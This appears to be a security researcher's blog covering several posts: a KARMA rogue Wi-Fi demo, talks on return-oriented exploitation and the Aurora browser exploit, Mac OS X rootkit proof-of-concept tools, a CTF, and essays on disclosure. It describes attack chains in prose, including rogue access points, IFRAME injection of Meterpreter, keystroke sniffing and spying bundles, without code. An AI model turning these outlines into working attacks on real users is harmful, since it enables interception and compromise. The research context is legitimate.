KARMA Demo on the CBS Early Show

Although I haven’t done any development on KARMA for a little over 5 years at this point, many of the weaknesses that it demonstrates are still very present, especially with the proliferation of open 802.11 Hotspots in public places. A few weeks ago, I was invited to help prepare a demo of KARMA for CBS News and the segment actually aired a few weeks ago. If you’re like me and don’t have one of those old-fashioned tele-ma-vision boxes, you can check out the segment here.

Unfortunately, they weren’t able to use the full demo that I prepared. The full demo used a KARMA promiscuous access point to lure clients onto my rogue wireless network with a rogue network’s gateway routed outbound HTTP traffic through a transparent proxy that injected IFRAMEs in each HTML page. The IFRAMEs loaded my own custom “Aurora” exploit, which injected Metasploit’s Meterpreter into the running web browser. From there, I could use the Meterpreter to sniff keystrokes as they logged into their SSL-protected bank/e-mail/whatever. The point was that even if a victim only uses the open Wi-Fi network to log into the captive portal webpage, that’s enough for a nearby attacker to exploit their web browser and maintain control over their system going forward. Perhaps that was a little too complicated for a news segment that the average American watches over breakfast.

As it has been quite a while since I have talked about KARMA, here are a few updates on the weaknesses that it demonstrated:

  • Windows XP SP2 systems with 802.11b-only wireless cards would “park” the cards when the user is not associated to a wireless network by assigning them a 32-character random desired SSID. Even if the user had no networks in their Preferred Networks List, the laptop would associate to a KARMA Promiscuous Access Point and activate the network stack while the GUI would still show the user as not currently associated to any network. This issue was an artifact of 802.11b-only card firmwares (PrismII and Orinoco were affected) and is not present on most 802.11g cards, which is what everyone has these days anyway.
  • Even with a newer card, Windows XP SP2 will broadcast the contents of its Preferred Networks List in Probe Request frames every 60 seconds until it joins a network. Revealing the contents of the PNL allows an attacker to create a network with that name or use a promiscuous access point to lure the client onto their rogue network. Windows Vista and XP SP3 fixed this behavior.
  • Mac OS X had the same two behaviors, except that Apple’s AirPort driver would enable WEP on the wireless card when it had “parked” it. However, the WEP key was a static 40-bit key (0x0102030405 if I recall). Apple issued a security update in July 2005 and credited me for reporting the issue.
  • On 10/17/2006, Microsoft released a hotfix to fix both of the previous issues on Windows XP SP2 systems that Shane Macaulay and I had discovered and presented at various security conferences over the previous two years.
  • Newer versions of Windows (XP SP3, Vista, 7) are only affected if the user manually selects to join the rogue wireless network or the rogue network beacons an SSID in the user’s Preferred Networks List.

Although the leading desktop operating systems found on most laptops have addressed the issue, most mobile phones now support 802.11 Wi-Fi, which may give KARMA a chance to live again!

BlackHat USA 2010

BlackHat is going to be a busy one for me this year because I am still trying to quit my nasty over-committing habit. But hopefully, I should have something that interests just about everybody.

If you love/hate Macs and like hacking, you should check out the Mac Hacking Class training that I am giving with Vincenzo Iozzo. We’ll be covering a lot of material including discovering and exploiting vulnerabilities, Mac OS X and Mach internals, and writing exploit payloads.

If Windows is more your style, you should check out my presentation, Return-Oriented Exploitation. I’ll be talking about using a variety of return-oriented techniques to bypass DEP/NX and ASLR on modern Windows operating systems, using my exploit for the “Operation Aurora” Internet Explorer vulnerability as an example and live demo. My presentation will be on Thursday at 1:45pm in the Exploitation Track (Augustus 1-2).

Finally, if you don’t really care about Macs or Windows, but do love security vulnerabilities and/or the infosec drama circus (b/c who really cares about the actual work we do?), you should check out the Pwnie Awards. For the 4th year in a row, Alex Sotirov and I have organized the Pwnie Awards to celebrate the achievements and failures of the information security industry. Along with our fellow esteemed judges (Dave Aitel, Mark Dowd, Halvar Flake, Dave Goldsmith, and HD Moore), we will be hosting the Pwnie Awards at 6:00pm on Wednesday, July 28th or July 29th (there seems to be some confusion on exactly which day it’ll be on and where currently). Follow the Pwnie Awards on Twitter for late-breaking updates.

Mac OS X Return-Oriented Exploitation

In The Mac Hacker’s Handbook and a few Mac-related presentations last year, I described my return-oriented exploitation technique for Mac OS X Leopard (10.5) for x86. This technique involved returning into the setjmp() function within dyld (the Mac OS X dynamic linker, which is loaded at a static location) to write out the values of controlled registers to a chosen location in writable and executable memory. By subsequently returning into that location, a few bytes of chosen x86 instructions could be executed. Performing this sequence twice will allow the attacker to execute enough chosen instructions to copy their traditional machine code payload into executable memory and execute it. In Snow Leopard (10.6), Apple has removed setjmp() from dyld, so I had to go back to the drawing board.

For my talk at REcon this year, Mac OS X Return-Oriented Exploitation, I applied my recent research in return-oriented programming and exploitation to Mac OS X to develop a few techniques against Snow Leopard x86 (32-bit) processes. I also talk about why attackers don’t really have to care about 64-bit x86_64 processes on Snow Leopard just yet. If you missed REcon this year (and why would you ever allow that to happen?!), you can download my slides here: Mac OS X Return-Oriented Exploitation.

Hacking at Mach Speed!

The first ever NYC SummerCon last weekend was a blast and everyone seemed to have a great time. As promised, there was 0day at the conference and hopefully no one remembered it because they were too drunk. Here are the slides for my presentation, (they are really no substitute for the live SummerCon experience). This presentation was a mix of some technical background on local Mach RPC on Mac OS X, a bug I found the day before the conference, and some miscellaneous rants from my presentation at BSidesSF.

It was awesome bringing the conference up to NYC and I had a great time opening up for Dr. Raid’s “Busticating DEP” presentation/freestyle busticati rap.

Practical Return-Oriented Programming

At a number of conferences this spring, I am presenting “Practical Return-Oriented Programming.” The talk is about taking the academic and applying it in the real world to developing exploits for Windows that bypass Permanent DEP using my BISC (Borrowed Instructions Synthetic Computer) library.  In the talk, I demonstrate exploitation of the Internet Explorer “Operation Aurora” vulnerability on Windows 7.  These techniques are not at all new, only my implementation is, and it owes much to previous research by Sebastian Krahmer’s “Borrowed Code Chunks” technique , Hovav Shacham’s Return-Oriented Programming, and Pablo Sole’s DEPLIB.

Assured Exploitation Training

This year, Alex Sotirov and I will be teaching our first “Assured Exploitation” training class at CanSecWest.  This training class is focused on various topics in advanced exploitation of memory corruption vulnerabilities.  This includes a thorough understanding of exploitation mitigations (where they are effective and where they aren’t), heap manipulation, return-oriented programming, and ensuring a clean continuation of process execution so that the application does not crash.

Over the course of the training, the hands-on exercises will be oriented around taking the students through the steps of fully understanding the “Aurora” Internet Explorer vulnerability and developing their own reliable and robust exploit for Internet Explorer 8 on Windows 7, just like the exploit demonstrated in this video demo of my exploit:

One Exploit Should Not Ruin Your Day

Now that the media excitement of the aftermath of Operation Aurora has calmed down and we are all soothing ourselves to sleep by the sound of promptly applying Windows Updates, it is a good time to take a look back and try and figure out what the changing threat landscape means for real-world information security (besides Selling! More! Security! Products!) and what lessons can be learned from it.

First off, the threat landscape has not changed at all, only the perception of it.  If you have done or been around any high-level incident response, you would know that these advanced persistent threats have been going on in various sectors for years.  Nor is it a new development that the attackers used an 0day client-side exploit along with targeted social engineering as their initial access vector.  What is brand new is the fact that a number of large companies have voluntarily gone public with the fact that they were victims to a targeted attack.  And this is the most important lesson: targeted attacks do exist and happen to a number of industries besides the usual ones like credit card processors and e-commerce shops.

For the last decade of the information security industry, almost all of the products and solutions have been designed to stop casual opportunistic attackers and mass Internet-scale attacks.  Moreover, these products are absolutely worthless in protecting you from an Aurora-style attack.  Your software vendor doesn’t have a patch for the vulnerability, your anti-virus and/or network intrusion prevention systems don’t have signatures for the exploit or agent it installs, and the 3rd-party software that your business needs to run prevents you from upgrading your desktops to the latest and greatest operating system and/or browser with the most complete exploit mitigations due to a lack of compatibility.  How many of these large security product vendors employ even one full-time person to play the role of a dedicated attacker attempting to bypass or defeat their defensive systems?  Or have even hired one attack-oriented consultant on a contract for an independent assessment of the efficacy of their product or solution?  Don’t let the same product vendors who failed to protect the victims of Operation Aurora turn right around and sell you those same products as a solution to “the APT threat.”

Second, Operation Aurora has no bearing on the vulnerability disclosure debate.  This particular vulnerability was apparently reported to Microsoft in August and scheduled to be patched in February.  Some are arguing that had this vulnerability been reported via full-disclosure to everyone all at once, it would not have been used in these attacks.  They are right.  The reality, however, is that another vulnerability would have been used instead.  These attacks show that the vulnerability disclosure debate and responsible disclosure process is simply a distraction that prevents us from actually improving security.  Remember, a vulnerability never owned anyone — an exploit did.  I am not arguing that vulnerabilities should not be fixed, simply that it is impossible to find and fix every security vulnerability so we should not let that obsession monopolize our efforts and prevent us from implementing more secure application and network designs.

Finally, the larger problem is that it only took one exploit to compromise these organizations.  One exploit should never ruin your day.  Isn’t that why we build DMZ networks with firewalls in front and behind them?  The point of doing that is so that it requires more than one server-side exploit to get into your organization.  Thanks to rich Internet client applications, it now only requires one client-side exploit to get into your organization.  Ideally, it should require around three or four: a remote code execution exploit, a sandbox escape or integrity level escalation exploit, and finally a local privilege escalation exploit in order to be able to install and hide a remote access backdoor on the system.  Also, workstations that receive e-mail and instant messages from strangers, visit random web sites, and download/install whatever software from the Internet should probably not be on the same network as something like your lawful intercept system.

Take this time to review which exploit mitigations such as DEP and ASLR are enabled in your web browser based on your operating system, browser release, and web plugins.  Take ‘/NoExecute=AlwaysOn’ for a spin in your boot.ini and see what (if anything) breaks.  Use this opportunity to get buy-in for placing users’ Internet-enabled workstations onto DMZ-like subnets where you can closely monitor data going in and out.  Give developers remote desktop access to VMs on a separate development network for working on your products (they will be happy as long as you give the VMs more RAM than their workstations so their builds are quicker).  Give everyone access to an external Wi-Fi network to use with their personal Internet-enabled devices.  Get started implementing some internal network segmentation.  Never let a good crisis go to waste.

CSAW CTF 2009

Friday, November 13th, 2009 was the final round of the NYU-Poly CSAW Capture the Flag Application Security Challenge.   The challenge was open to teams of graduate and undergraduate students from around the world.  The preliminary round was performed over the Internet, giving teams 24 hours to complete a number of challenges in web application security, reverse engineering, and exploitation of memory corruption vulnerabilities.  Congratulations to all of the teams who played, those that made the finals, and especially to the winning teams: ppop, RPISEC, and SecDaemons.

I was responsible for creating and judging the exploitation challenges.  Because I love RISC CPU architectures, I made the challenges revolve around exploitation of embedded Linux systems on x86, PowerPC, ARM, and SH4 processors.  Stephen Ridley created a set of Windows binary reverse engineering challenges and an online scoreboard that was used for the preliminary rounds.  Here are the reversing and exploitation challenges for anyone who is interested in giving them a try for themselves:

  • My embedded Linux exploitation challenges (147 MB): BitTorrent
  • Stephen Ridley’s Windows binary reverse engineering challenges: GitHub

Advanced Mac OS X Rootkits

At BlackHat USA 2009, I presented “Advanced Mac OS X Rootkits” covering a number of Mach-based rootkit techniques and some tools that I have developed to demonstrate them.  While the majority of Mac OS X rootkits employ known and traditional Unix-based rootkit techniques, these Mach-based techniques show what else is possible using the powerful Mach abstractions in Mac OS X.  My presentation covered a number of Mach-based rootkit tools and techniques including user-mode Mach-O bundle injection, Mach RPC proxying, in-kernel RPC server injection/modification, and kernel rootkit detection.

User-mode DLL injection is quite common on Windows-based operating systems and is facilitated by the CreateRemoteThread API function.  The Mach thread and task calls support creating threads in other tasks, however, they are much more low-level.  The inject-bundle tool demonstrates the steps necessary to use injected memory and threads to load a Mach-O bundle into another task.  A number of injectable bundles are included to demonstrate the API (test), capture an image using the iSight camera (iSight), log instant messages from within iChat (iChatSpy), and log SSL traffic sent through the Apple Secure Transport API (SSLSpy).

The majority of Mach kernel services (task and thread system calls, for example) are implemented as RPC services.  The Mach message format was designed to be host-independent, which facilitates transferring them across the network.  Machiavelli demonstrates using Mach RPC proxying in order to transparently perform Mach RPC to a remote host. Machiavellian versions of ps and inject-bundle are included in order to demonstrate how this technique may be used for remote host control by rootkits.

Most of the public kernel rootkits for Mac OS X load as kernel extensions and remove their entries from the kernel’s kmod list in order to hide themselves from kextstat and prevent themselves from being unloaded. The uncloak tool examines the kernel memory regions looking for loaded Mach-O objects.  If any of these objects do not correspond to a known kernel extension, they may be dumped to disk using kernel-macho-dump.

Mach IPC messages to the in-kernel Mach RPC servers are dispatched through the mig_buckets table.  This table stores function pointers to the kernel RPC server routines and is analogous to the Unix systent system call table.  A kernel rootkit may directly modify this table in order to inject new kernel RPC servers or interpose on in-kernel RPC server routines.  The KRPC kernel extension shows how a kernel rootkit may directly modify this table in order to dynamically inject a new in-kernel RPC subsystem.

These tools are deliberately released as ‘non-hostile’
proof-of-concept tools that meant to demonstrate techniques and are
not suitable for use in actual rootkits or attack tools.  The IM and
SSL logging bundles log to the local system’s disk in an obvious
fashion and Machiavelli opens up the controlling host to some obvious
attacks.  The non-Machiavelli version of inject-bundle, however, is
fully functional and useful for a variety of system-level tasks.
Using the other tools outside of a closed network or test virtual
machine is not recommended.

These tools are deliberately released as ‘non-hostile’ proof-of-concept tools that meant to demonstrate techniques and are not suitable for use in actual rootkits or attack tools.  The IM and SSL logging bundles log to the local system’s disk in an obvious fashion and Machiavelli opens up the controlling host to some obvious attacks.  The non-Machiavelli version of inject-bundle, however, is fully functional and useful for a variety of system-level tasks.  Using the other tools outside of a closed network or test virtual machine is not recommended.

Here are the goods:

No More Free Bugs

No More Free Bugs

Alex and I holding "No More Free Bugs" sign during Charlie's Lighting Talk at CanSecWest

A few weeks ago, Charlie Miller, Alex Sotirov, and I arrived on a new meme: No More Free Bugs.  We started talking about it publicly at CanSecWest where Charlie Miller notably announced it for his Lightning Talk and in his ZDNet interview.  It is now making its way through Twitter and the rest of the tubes.  It is understandable that this may be a controversial position, so I’m going to give some more background on the argument here.

First, this is neither advocating non-disclosure nor any disclosure at all.  That decision is left to the discoverer of the vulnerability.  I’m not even going to touch the anti/partial/full disclosure argument.

Second, this philosophy is primarily regarding vulnerabilities in products sold for profit by for profit companies, especially those that already employ security engineers as employees or consultants.  Vulnerabilities discovered in open source projects or Internet infrastructure deservedly require different handling.

The basic argument is as follows:

  • Vulnerabilities place users and customers at risk.  Otherwise, vendors wouldn’t bother to fix them.  Internet malware and worms spread via security vulnerabilities and place home users’ and enterprises’ sensitive data at risk.
  • Vulnerabilities have legitimate value.  Software vendors pay their own employees and consultants to find them and help them fix them in their products during development.  Third-party companies such as Verisign (iDefense) and ZDI will pay researchers for exclusive rights to the vulnerability so that they may responsibly disclose it to the vendor but also share advance information about it to their customers (Verisign/iDefense) or build detection for it into their product (ZDI).  Google is even offering a cash bounty for the best security vulnerability in Native Client.  Donald Knuth personally pays for bugs found in his software and Dan Bernstein paid $1000 personally as a bounty for a vulnerability in djbdns.
  • Reporting vulnerabilities can be legally and professionally risky.  When a researcher discloses the vulnerability to the vendor, there is no “whistle blower” protection and independent security researchers may be unable to legally defend themselves.  You may get threatened, sued, or even thrown in jail.  A number of security researchers have had their employers pressured by vendors to whom they were responsibly disclosing security vulnerabilities.  Vendors expect security researchers to follow responsible disclosure guidelines when they volunteer vulnerabilities, but they are under no such pressure to follow responsible guidelines in their actions towards security researchers.  Where are the vendors’ security research amnesty agreements?
  • It is unfair to paying customers.  Professional bug hunting is a specialized and expensive business.  Software vendors that “freeload” on the security research community place their customers at risk by not putting forth resources to discover vulnerabilities in and fix their products.

Therefore, reporting vulnerabilities for free without any legal agreements in place is risky volunteer work.  There are a number of legitimate alternatives to the risky proposition of volunteering free vulnerabilities and I have already mentioned a few (I don’t want to turn this into an advertisement or discussion on the best/proper way to monetize security research).   There just need to be more legal and transparent options for monetizing security research.  This would provide a fair market value for a researcher’s findings and incentivize more researchers to find and report vulnerabilities to these organizations.  All of this would help make security research a more widespread and legitimate profession.  In the meantime, I’m not complaining about its current cachet and allure.

Follow

Get every new post delivered to your Inbox.

Join 3,758 other followers